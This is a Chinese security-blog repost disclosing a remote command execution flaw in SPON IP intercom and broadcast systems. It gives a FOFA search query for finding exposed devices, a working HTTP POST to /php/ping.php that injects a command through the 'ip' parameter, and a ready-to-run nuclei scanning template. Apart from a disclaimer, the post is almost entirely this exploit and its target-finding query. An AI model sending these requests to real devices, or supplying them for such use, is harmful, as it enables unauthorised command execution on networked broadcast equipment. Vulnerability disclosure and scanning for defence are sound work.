世邦通信——ip网络对讲广播系统RCE

admin 2024年1月7日22:00:38评论60 views字数 1254阅读4分10秒阅读模式

一、免责声明:


      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:


世邦通信——ip网络对讲广播系统RCE

三、资产梳理:


fofa:icon_hash="-1830859634"

四、漏洞复现:

世邦通信——ip网络对讲广播系统RCE

五、POC:


POST /php/ping.php HTTP/1.1Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: _wnd_size_mode=4Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 48
jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

nuclei:

id: spon_duijiangguangbo_rce
info: name: 世邦科技股份有限公司——IP网络对讲广播系统远程命令执行漏洞 author: joyboy severity: critical description: 攻击者可以通过在受攻击系统上执行恶意命令,从而获取未授权的系统访问权限。 metadata: max-request: 1 fofa-query: icon_hash="-1830859634" verified: true
requests: - raw: - |+ POST /php/ping.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Content-Type: application/x-www-form-urlencoded jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig
matchers: - type: dsl dsl: - "status_code == 200 && contains(body, 'IPv4')"


世邦通信——ip网络对讲广播系统RCE


原文始发于微信公众号(fly的渗透学习笔记):世邦通信——ip网络对讲广播系统RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日22:00:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   世邦通信——ip网络对讲广播系统RCEhttps://cn-sec.com/archives/2348110.html

发表评论

匿名网友 填写信息